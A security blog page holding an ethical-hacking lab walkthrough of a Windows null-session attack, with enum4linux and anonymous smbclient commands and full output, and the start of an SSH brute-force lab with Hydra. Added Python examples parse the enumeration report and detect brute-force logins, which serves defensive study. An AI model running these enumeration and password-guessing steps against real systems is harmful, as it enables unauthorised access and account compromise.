
OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.


PORTFOLIO


  • Eliminate Your Fears And Doubts About Null Session Attack

    https://www.kumaratuljaiswal.in

    The final goal of this blog post is to show you how to retrieve information from the target machine, such as shares, users, groups and so on. Moreover, by navigating the remote machine, you should be able to find a file named "Congratulations.txt". Download it and explore its content.



    A Windows machine can share a file or a directory on the network; this lets local and remote users access the resource and, possibly, modify it.


    Example


    A file server in an office lets users open and edit the documents of their own department, while it lets everyone read, but not modify, public information files.

    This feature is very useful in a network environment: the ability to share resources and files reduces redundancy and can improve work efficiency in a company. Shares can be either extremely useful when used properly or extremely dangerous when configured improperly. Creating network shares in a Windows-based environment is fairly easy: generally users just need to turn on the File and Printer Sharing service, and then they can start sharing directories or files.

    Users can also set permissions on a share, stating who can perform operations such as reading, writing and modifying permissions. Users can choose to share a single file or to use the Public directory. When sharing a single file they can choose which local or remote users to share it with; when using the Public directory they can choose which local users can access the files on the share, but they can only allow everyone or no one on the network to access the share.




    An authorised user can access a share by using a Universal Naming Convention (UNC) path.


    The format of a UNC path is:

    \\ServerName\ShareName\file.nat



    Administrative shares


    There are also some special default administrative shares, used by system administrators and by Windows itself:

    \\ComputerName\C$ lets an administrator access a volume on the local machine. Every volume has such a share (C$, D$, E$, etc.).

    \\ComputerName\admin$ points to the Windows installation directory.

    \\ComputerName\ipc$ is used for inter-process communication. You cannot browse it via Windows Explorer.



    You can test a volume share and the admin$ share on your computer by entering the following in the Windows Explorer address bar:


    \\localhost\<sharename>

    \\localhost\d$



    Null session attacks can be used to enumerate a lot of information. Attackers can steal information about:


    # Passwords
    # System users
    # System groups
    # Running system processes


    Null sessions are remotely exploitable: attackers can use their own computers to attack a vulnerable Windows machine. Moreover, a null session can be used to call remote APIs and remote procedure calls. Because of these factors, null session attacks had a huge impact on the Windows ecosystem.

    Nowadays Windows is configured to be immune from this kind of attack. However, legacy hosts can still be vulnerable.

    A null session is a vulnerability affecting Windows administrative shares: it lets an attacker connect to a local or remote share without authentication.

    We will go through the enumeration of Windows shares and their exploitation using various techniques and tools.




    Tools


    The best tools for this lab are:

    # enum4linux
    # samrdump
    # smbclient



    Steps


    # Find a target in the network
    # Check for null session
    # Exploit null session

    It's time to get our hands dirty.



    # Gather information with enum4linux

    Use enum4linux and gather the following information:

    # Shares
    # Users
    # Password policies
    # Groups



    Use smbclient to navigate the target machine

    Mount the share, or use the smbclient interactive command line, to navigate the remote machine and find and inspect the content of the Congratulations.txt file.



    Find a target in the network


    We first need to find out which network the target is on. We can do this by running ifconfig and checking the IP address of our tap0 interface.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ifconfig
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 2201  bytes 96326 (94.0 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 2201  bytes 96326 (94.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.99.101  netmask 255.255.255.0  broadcast 0.0.0.0
            inet6 fe80::5044:42ff:fe4d:3eb6  prefixlen 64  scopeid 0x20<link>
            ether 52:44:42:4d:3e:b6  txqueuelen 1000  (Ethernet)
            RX packets 3  bytes 363 (363.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 522  bytes 22356 (21.8 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.98.25  netmask 255.255.255.0  broadcast 192.168.98.255
            inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 92211  bytes 102634365 (97.8 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 55571  bytes 9521350 (9.0 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    



    As we can see, the target network is 192.168.99.0/24 (note that your IP address may differ from the previous screenshot). Let's run nmap to discover live hosts on the network:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sn 192.168.99.0/24
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
    Nmap scan report for 192.168.99.162
    Host is up (0.53s latency).
    MAC Address: 00:50:56:A5:DF:D7 (VMware)
    Nmap scan report for 192.168.99.101
    Host is up.
    Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    




    The previous screenshot shows that the only host alive on the network is 192.168.99.162 (besides our host: 192.168.99.20).


    Check for null session


    Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following screenshot, we are using enum4linux, but you can use any tool you prefer.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 192.168.99.162
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ====================================================== 
    |    Enumerating Workgroup/Domain on 192.168.99.162    |
     ====================================================== 
    [+] Got domain/workgroup name: WORKGROUP
    
     ============================================== 
    |    Nbtstat Information for 192.168.99.162    |
     ============================================== 
    Looking up status of 192.168.99.162
            ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
            WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
            ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
            WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
            WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
            ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    
            MAC Address = 00-50-56-A5-DF-D7
    
     ======================================= 
    |    Session Check on 192.168.99.162    |
     ======================================= 
    [+] Server 192.168.99.162 allows sessions using username '', password ''
    
     ============================================= 
    |    Getting domain SID for 192.168.99.162    |
     ============================================= 
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
    enum4linux complete on Sun Dec 26 21:03:38 2021
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    



    We can see that the File Server Service is active (the <20> entry in the nbtstat list) and, in the Session Check section, that the server allows sessions with an empty username and password: a null session.



    Exploit null session

    It is time to get our hands dirty!



    Gather information with enum4linux

    Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ enum4linux -a 192.168.99.162
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 192.168.99.162
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ====================================================== 
    |    Enumerating Workgroup/Domain on 192.168.99.162    |
     ====================================================== 
    [+] Got domain/workgroup name: WORKGROUP
    
     ============================================== 
    |    Nbtstat Information for 192.168.99.162    |
     ============================================== 
    Looking up status of 192.168.99.162
            ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
            WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
            ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
            WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
            WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
            ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    
            MAC Address = 00-50-56-A5-DF-D7
    
     ======================================= 
    |    Session Check on 192.168.99.162    |
     ======================================= 
    [+] Server 192.168.99.162 allows sessions using username '', password ''
    
     ============================================= 
    |    Getting domain SID for 192.168.99.162    |
     ============================================= 
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
    
     ======================================== 
    |    OS information on 192.168.99.162    |
     ======================================== 
    Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
    [+] Got OS info for 192.168.99.162 from smbclient: 
    [+] Got OS info for 192.168.99.162 from srvinfo:
            192.168.99.162 Wk Sv NT PtB LMB     
            platform_id     :       500
            os version      :       5.1
            server type     :       0x51003
    
     =============================== 
    |    Users on 192.168.99.162    |
     =============================== 
    index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
    index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS      Name: (null)    Desc: (null)
    index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank    Name: Frank     Desc: (null)
    index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
    index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant    Name: Remote Desktop Help Assistant Account     Desc: Account for Providing Remote Assistance
    index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin  Desc: (null)
    index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US      Desc: This is a vendor's account for the Help and Support Service
    
    user:[Administrator] rid:[0x1f4]
    user:[eLS] rid:[0x3eb]
    user:[Frank] rid:[0x3ed]
    user:[Guest] rid:[0x1f5]
    user:[HelpAssistant] rid:[0x3e8]
    user:[netadmin] rid:[0x3ec]
    user:[SUPPORT_388945a0] rid:[0x3ea]
    
     =========================================== 
    |    Share Enumeration on 192.168.99.162    |
     =========================================== 
    
            Sharename       Type      Comment
            ---------       ----      -------
            My Documents    Disk      
            IPC$            IPC       Remote IPC
            Frank           Disk      
            C               Disk      
            WorkSharing     Disk      
            FrankDocs       Disk      
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
    Reconnecting with SMB1 for workgroup listing.
    
            Server               Comment
            ---------            -------
    
            Workgroup            Master
            ---------            -------
    
    [+] Attempting to map shares on 192.168.99.162
    //192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
    //192.168.99.162/Frank  Mapping: OK     Listing: DENIED
    //192.168.99.162/C      [E] Can't understand response:
      AUTOEXEC.BAT                        A        0  Fri Feb 13 06:20:47 2015
      boot.ini                           HS      211  Fri Feb 13 06:16:17 2015
      CONFIG.SYS                          A        0  Fri Feb 13 06:20:47 2015
      Documents and Settings              D        0  Wed Feb 18 14:55:58 2015
      IO.SYS                           AHSR        0  Fri Feb 13 06:20:47 2015
      MSDOS.SYS                        AHSR        0  Fri Feb 13 06:20:47 2015
      NTDETECT.COM                     AHSR    47564  Tue Aug  3 22:38:34 2004
      ntldr                            AHSR   250032  Tue Aug  3 22:59:34 2004
      pagefile.sys                      AHS 805306368  Thu Dec 23 22:59:58 2021
      Program Files                      DR        0  Mon Oct  3 21:40:27 2016
      System Volume Information         DHS        0  Fri Feb 13 06:24:12 2015
      WINDOWS                             D        0  Mon Oct  3 21:42:49 2016
    
                    785224 blocks of size 4096. 345608 blocks available
    //192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
    //192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
    //192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
    //192.168.99.162/C$     Mapping: DENIED, Listing: N/A
    
     ====================================================== 
    |    Password Policy Information for 192.168.99.162    |
     ====================================================== 
    
    
    [+] Attaching to 192.168.99.162 using a NULL share
    
    [+] Trying protocol 139/SMB...
    
            [!] Protocol failed: Cannot request session (Called Name:192.168.99.162)
    
    [+] Trying protocol 445/SMB...
    
    [+] Found domain(s):
    
            [+] ELS-WINXP
            [+] Builtin
    
    [+] Password Info for Domain: ELS-WINXP
    
            [+] Minimum password length: None
            [+] Password history length: None
            [+] Maximum password age: 42 days 22 hours 47 minutes 
            [+] Password Complexity Flags: 000000
    
                    [+] Domain Refuse Password Change: 0
                    [+] Domain Password Store Cleartext: 0
                    [+] Domain Password Lockout Admins: 0
                    [+] Domain Password No Clear Change: 0
                    [+] Domain Password No Anon Change: 0
                    [+] Domain Password Complex: 0
    
            [+] Minimum password age: None
            [+] Reset Account Lockout Counter: 30 minutes 
            [+] Locked Account Duration: 30 minutes 
            [+] Account Lockout Threshold: None
            [+] Forced Log off Time: Not Set
    
    
    [+] Retieved partial password policy with rpcclient:
    
    Password Complexity: Disabled
    Minimum Password Length: 0
    
    
     ================================ 
    |    Groups on 192.168.99.162    |
     ================================ 
    
    [+] Getting builtin groups:
    group:[Administrators] rid:[0x220]
    group:[Backup Operators] rid:[0x227]
    group:[Guests] rid:[0x222]
    group:[Network Configuration Operators] rid:[0x22c]
    group:[Power Users] rid:[0x223]
    group:[Remote Desktop Users] rid:[0x22b]
    group:[Replicator] rid:[0x228]
    group:[Users] rid:[0x221]
    
    [+] Getting builtin group memberships:
    Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
    Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
    Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
    Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
    Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
    
    [+] Getting local groups:
    group:[HelpServicesGroup] rid:[0x3e9]
    
    [+] Getting local group memberships:
    Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0
    
    [+] Getting domain groups:
    group:[None] rid:[0x201]
    
    [+] Getting domain group memberships:
    Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
    Group 'None' (RID: 513) has member: ELS-WINXP\Guest
    Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
    Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
    Group 'None' (RID: 513) has member: ELS-WINXP\eLS
    Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
    Group 'None' (RID: 513) has member: ELS-WINXP\Frank
    
     ========================================================================= 
    |    Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050)    |
     ========================================================================= 
    [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
    [I] Found new SID: S-1-5-32
    [I] Found new SID: S-1-5-21-823518204-2025429265-839522115
    [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
    [+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''
    
     =============================================== 
    |    Getting printer info for 192.168.99.162    |
     =============================================== 
    Cannot connect to server.  Error was NT_STATUS_NETWORK_UNREACHABLE
    
    
    enum4linux complete on Sun Dec 26 22:35:32 2021
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    


    As we can see in the previous screenshots, we were able to gather a lot of information from the machine.
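    The enum4linux report above already contains everything the host's owner needs for remediation: an anonymous session is accepted, WorkSharing is listable without credentials, the password policy is empty and three local accounts are administrators. The following added example (not code from the original write-up) parses a constructed excerpt in that report format and turns it into a list of findings; the 8-character minimum-length threshold is my assumption.

```python
import re
from collections import defaultdict

# Constructed excerpt in the format of the enum4linux -a report above, trimmed to
# the sections the parser reads; the values mirror the lab host in the write-up.
SAMPLE = r"""
[+] Server 192.168.99.162 allows sessions using username '', password ''
user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[netadmin] rid:[0x3ec]

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk
        IPC$            IPC       Remote IPC
        Frank           Disk
        WorkSharing     Disk
        ADMIN$          Disk      Remote Admin
[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/Frank  Mapping: OK     Listing: DENIED
//192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
        [+] Minimum password length: None
        [+] Account Lockout Threshold: None
Password Complexity: Disabled
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
"""

NULL_RE = re.compile(r"allows sessions using username '', password ''")
USER_RE = re.compile(r"^user:\[([^\]]+)\] rid:\[(0x[0-9a-f]+)\]", re.M)
SHARE_RE = re.compile(r"^[ \t]+(.+?)[ \t]{2,}(Disk|IPC|Printer)[ \t]*(.*)$", re.M)
MAP_RE = re.compile(r"^//[^/]+/(\S+)[ \t]+Mapping:[ \t]*(\w+),?[ \t]+Listing:[ \t]*(\S+)", re.M)
GROUP_RE = re.compile(r"^Group '([^']+)' \(RID: \d+\) has member: (.+)$", re.M)


def _policy_int(text, label):
    """Numeric value of the first '<label>: value' line; enum4linux prints 'None' for 0."""
    m = re.search(label + r":[ \t]*(\S+)", text, re.I)
    if not m:
        return None
    value = m.group(1)
    return 0 if value.lower() == "none" else int(value)


def parse_enum4linux(text):
    """Extract the security-relevant facts from an enum4linux -a report."""
    groups = defaultdict(list)
    for group, member in GROUP_RE.findall(text):
        groups[group].append(member)
    complexity = re.search(r"Password Complexity:[ \t]*(\w+)", text)
    return {
        "null_session": bool(NULL_RE.search(text)),
        "users": [name for name, _rid in USER_RE.findall(text)],
        "shares": [{"name": n.strip(), "type": t, "comment": c.strip()}
                   for n, t, c in SHARE_RE.findall(text)],
        # share name -> (mapping result, listing result) for the anonymous attempt
        "share_access": {n: (m, l) for n, m, l in MAP_RE.findall(text)},
        "password_policy": {
            "min_length": _policy_int(text, "Minimum password length"),
            "complexity": complexity.group(1) if complexity else None,
            "lockout_threshold": _policy_int(text, "Account Lockout Threshold"),
        },
        "groups": dict(groups),
    }


def is_administrative(share):
    """Default administrative shares end in '$' (C$, ADMIN$, IPC$, as described above)."""
    return share.endswith("$")


def assess(report):
    """Turn the parsed report into remediation findings for the host's owner."""
    findings = []
    if report["null_session"]:
        findings.append("null session: server accepts an empty username and password")
    for share, (mapping, listing) in report["share_access"].items():
        if listing == "OK":
            findings.append(f"share {share}: listable without authentication")
        elif mapping == "OK" and is_administrative(share):
            findings.append(f"administrative share {share}: mappable without authentication")
    policy = report["password_policy"]
    if policy["min_length"] is not None and policy["min_length"] < 8:  # 8 is my threshold
        findings.append(f"password policy: minimum length {policy['min_length']}")
    if (policy["complexity"] or "").lower() == "disabled":
        findings.append("password policy: complexity disabled")
    if policy["lockout_threshold"] == 0:
        findings.append("password policy: no lockout threshold, password guessing is unthrottled")
    admins = report["groups"].get("Administrators", [])
    if len(admins) > 1:
        findings.append(f"{len(admins)} local administrators: {', '.join(admins)}")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_enum4linux(SAMPLE)):
        print("[!]", finding)
```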




    Use smbclient to navigate the target machine


    A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.

    First let us get the list of shares using smbclient:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo smbclient -L WORKGROUP -I 192.168.99.162  -N -U ""
    
            Sharename       Type      Comment
            ---------       ----      -------
            My Documents    Disk      
            IPC$            IPC       Remote IPC
            Frank           Disk      
            C               Disk      
            WorkSharing     Disk      
            FrankDocs       Disk      
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
    Reconnecting with SMB1 for workgroup listing.
    
            Server               Comment
            ---------            -------
    
            Workgroup            Master
            ---------            -------
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    

    Let us now try to access the WorkSharing share and see what files are stored in there:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                               1
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N                                                                             1 ⨯
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Feb 18 16:37:31 2015
      ..                                  D        0  Wed Feb 18 16:37:31 2015
      Congratulations.txt                 A       66  Wed Feb 18 15:11:59 2015
    
                    785224 blocks of size 4096. 345613 blocks available
    smb: \> 
    smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
    getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \> 
    
    
    







    As we can see in the previous screenshot there is a file named Congratulations.txt. Let us download it to our machine and then use the cat command to display its content.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ cat congratulations.txt                     
    Congratulations! You have successfully exploited a null session!
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.


  • Brute Force and Password Cracking Live via three different tools



    Representation


    You are a penetration tester hired by the company Hacking Truth to perform password cracking/brute force tests on their internal web application and machines, starting from known usernames, as part of a security test. You are asked to perform the penetration test on the client premises.



    Brute Force and Password Cracking Live on Metasploitable 2 via three different tools



    In this Metasploitable 2 environment, we get access to a Kali GUI instance. The SSH server can be tested using the tools installed on the Kali virtual machine.

    Objective: Perform the following activities:

    1. Find the password of user "msfadmin" using Hydra. Use the password dictionary //home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt.

    2. Find the password of user "msfadmin" using the appropriate Nmap script. Use the default password dictionary list /usr/share/nmap/nselib/data/passwords.lst and the user list /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt.

    3. Find the password of user "msfadmin" using the ssh_login Metasploit module. Use the userpass dictionary /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt.


    Tools


    The best tools for this lab are:

    # Metasploit Framework
    # Hydra
    # Nmap



    Check the interfaces present on the Kali machine.

    Command - ifconfig


    There is an eth0 interface available and its IP is 192.168.6.45.




    Using Hydra


    Use Hydra to launch a dictionary attack on the SSH service for the "student" user.

    Hydra

    # Multi-threaded authentication brute force tool
    # Supports numerous protocols, including FTP, HTTP, IMAP, IRC, LDAP, SSH, VNC, etc.
    # Written in C
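    A multi-threaded dictionary attack like the Hydra run described here leaves an unmistakable trace on the target: a burst of failed SSH logins from one source within seconds, possibly followed by an accepted login once the dictionary hits. The following added example (not code from the original write-up) runs that detection over constructed OpenSSH auth.log lines; hostnames, PIDs, ports and times are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed OpenSSH auth.log lines (hostname, PIDs, ports and times are made up).
# The first block is what a Hydra run against "msfadmin" looks like from the server.
SAMPLE_LOG = """\
Dec 26 21:10:01 metasploitable sshd[2201]: Failed password for msfadmin from 192.168.6.45 port 51001 ssh2
Dec 26 21:10:02 metasploitable sshd[2203]: Failed password for msfadmin from 192.168.6.45 port 51002 ssh2
Dec 26 21:10:02 metasploitable sshd[2205]: Failed password for invalid user root from 192.168.6.45 port 51003 ssh2
Dec 26 21:10:03 metasploitable sshd[2207]: Failed password for msfadmin from 192.168.6.45 port 51004 ssh2
Dec 26 21:10:04 metasploitable sshd[2209]: Failed password for msfadmin from 192.168.6.45 port 51005 ssh2
Dec 26 21:10:05 metasploitable sshd[2211]: Failed password for msfadmin from 192.168.6.45 port 51006 ssh2
Dec 26 21:10:06 metasploitable sshd[2213]: Accepted password for msfadmin from 192.168.6.45 port 51007 ssh2
Dec 26 21:15:30 metasploitable sshd[2250]: Failed password for alice from 10.0.0.7 port 40001 ssh2
Dec 26 21:15:40 metasploitable sshd[2252]: Accepted password for alice from 10.0.0.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Accepted|Failed) password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_sshd_line(line):
    """Return {ts, outcome, user, src} for a password-auth line, else None.
    syslog timestamps carry no year; strptime defaults to 1900, which keeps the
    differences correct (assumption: the log does not cross a year boundary)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, outcome, user, src = m.groups()
    return {"ts": datetime.strptime(ts, "%b %d %H:%M:%S"),
            "outcome": outcome.lower(), "user": user, "src": src}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Alert when one source produces `threshold` failed logins inside a sliding
    window, and record whether a login from that source succeeded afterwards."""
    per_src = defaultdict(list)
    for event in filter(None, map(parse_sshd_line, lines)):
        per_src[event["src"]].append(event)
    alerts = []
    for src, events in per_src.items():
        events.sort(key=lambda e: e["ts"])
        recent = deque()          # failure timestamps still inside the window
        triggered_at = None
        for e in events:
            if e["outcome"] != "failed":
                continue
            recent.append(e["ts"])
            while (e["ts"] - recent[0]).total_seconds() > window_seconds:
                recent.popleft()
            if triggered_at is None and len(recent) >= threshold:
                triggered_at = e["ts"]
        if triggered_at is None:
            continue
        alerts.append({
            "src": src,
            "triggered_at": triggered_at,
            "failures": sum(e["outcome"] == "failed" for e in events),
            "users": sorted({e["user"] for e in events}),
            # a success after the burst is the case to escalate: a guess worked
            "success_after": any(e["outcome"] == "accepted" and e["ts"] >= triggered_at
                                 for e in events),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```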


    Hydra help option

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -h                                                                                       
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
    
    Options:
      -R        restore a previous aborted/crashed session
      -I        ignore an existing restore file (don't wait 10 seconds)
      -S        perform an SSL connect
      -s PORT   if the service is on a different default port, define it here
      -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
      -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
      -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
      -y        disable use of symbols in bruteforce, see above
      -r        use a non-random shuffling method for option -x
      -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
      -u        loop around users, not passwords (effective! implied with -x)
      -C FILE   colon separated "login:pass" format, instead of -L/-P options
      -M FILE   list of servers to attack, one entry per line, ':' to specify port
      -o FILE   write found login/password pairs to FILE instead of stdout
      -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
      -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
      -t TASKS  run TASKS number of connects in parallel per target (default: 16)
      -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
      -w / -W TIME  wait time for a response (32) / between connects per thread (0)
      -c TIME   wait time per login attempt over all threads (enforces -t 1)
      -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
      -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
      -O        use old SSL v2 and v3
      -K        do not redo failed attempts (good for -M mass scanning)
      -q        do not print messages about connection errors
      -U        service module usage details
      -m OPT    options specific for a module, see -U output for information
      -h        more command line options (COMPLETE HELP)
      server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
      service   the service to crack (see below for supported protocols)
      OPT       some service modules support additional input (-U for module help)
    
